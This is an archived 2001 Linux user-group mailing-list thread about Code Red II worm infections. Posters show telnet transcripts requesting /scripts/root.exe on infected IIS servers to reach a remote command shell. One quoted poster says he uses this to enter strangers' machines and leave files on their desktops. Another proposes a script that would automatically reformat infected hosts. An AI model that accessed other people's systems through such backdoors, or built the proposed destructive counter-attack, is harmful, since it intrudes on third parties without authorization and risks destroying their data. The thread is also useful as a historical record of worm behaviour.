CR worm infection attempts

Jason plug-discuss@lists.PLUG.phoenix.az.us
Thu, 23 Aug 2001 23:23:10 +0000 

Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx).
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 23 Aug 2001 22:34:30 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>cd \



--

Then nothing. I reconnected, got the exact same results. The command
"DIR" doesnt work either. Perhaps Im grossly misunderstanding
something, but it doesnt seem like its actually compromised - nothing
will run. I dont think the machine is greatly overloaded either, given
how rapidly it responds to an attempt to reconnect.

Or perhaps there is some new toolkit out there that is killing
processes named root.exe. Its hard to say. That one particular box
attempted to install Code Red on my own machine several times.

Perhaps someone should write a script that examines logs and then
automatically euthanizes any Code Red box with a full reformat. While
this may seem harsh, keep in mind said box is currently infecting
anything else it can - if people can lose their freedom and property
for this "crime", then surely reformatting is a just responce to a
device doing so, particularly if it stops said action. If a car was
running over children in a parking lot, out of control all "Christine"
like, no one would be too upset if someone rolled over it with a tank.

Thats what backups are for, right? You did make backups didnt you?

If they're using M$ products and arent making backups, they deserve
whats coming to them anyways. Fuck 'em if they cant take a joke
anyways LOL.

Kim Allen wrote:
> 
> I've been contacting the sites that my server logs shows that have been
> hitting me with the code red signature and so far no one has bothered to
> respond except for one. However that site has told me how secure they are
> and how there is no way that they have any problems. When I sent them the
> portions of my server logs showing they do have problem they threaten
> legal action. Anyone else have had this type of response?
> 
> > To answer your question... make sure you're hitting enter TWICE after
> > the command.
> >
> > As a security guy myself, I'm deeply troubled by what I'm finding.
> > Check it out:
> >
> > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > Trying xxx.xxx.xxx.xxx...
> > Connected to xxx.xxx.xxx.xxx.
> > Escape character is '^]'.
> > GET /scripts/root.exe HTTP/1.0
> >
> > HTTP/1.1 200 OK
> > Server: Microsoft-IIS/5.0
> > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > Content-Type: application/octet-stream
> > Microsoft Windows 2000 [Version 5.00.2195]
> > (C) Copyright 1985-1999 Microsoft Corp.
> >
> > c:\inetpub\scripts>
> >
> > >From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
> > that explains how I did it, and why they need to pay attention to
> > security patches. :)
> >
> > Hopefully they won't take it the 'wrong' way.
> >
> > ~g~
> >
> > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > Wayne Conrad wrote:
> > > >
> > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > keep recreating the same data each time.
> > > >
> > > > Are you putting the IP's up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > > >     Wayne
> > > ________________________________________________
> > >
> > > I've been trying that out
> > >
> > > telnet ipaddress_from_my_httpd_access_log 80
> > >
> > > GET /scripts/root.exe HTTP/1.0
> > >
> > > but I can't get a command prompt - what am I missing?
> > >
> > > Craig
> > > ________________________________________________
> > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > >
> > > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > >
> >
> >
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> >
> > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> >
> 
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> 
> PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

-- 
jkenner @ mindspring . com__
I Support Linux:           _> _  _ |_  _  _     _|
Working Together To       <__(_||_)| )| `(_|(_)(_|
To Build A Better Future.       |                   <s>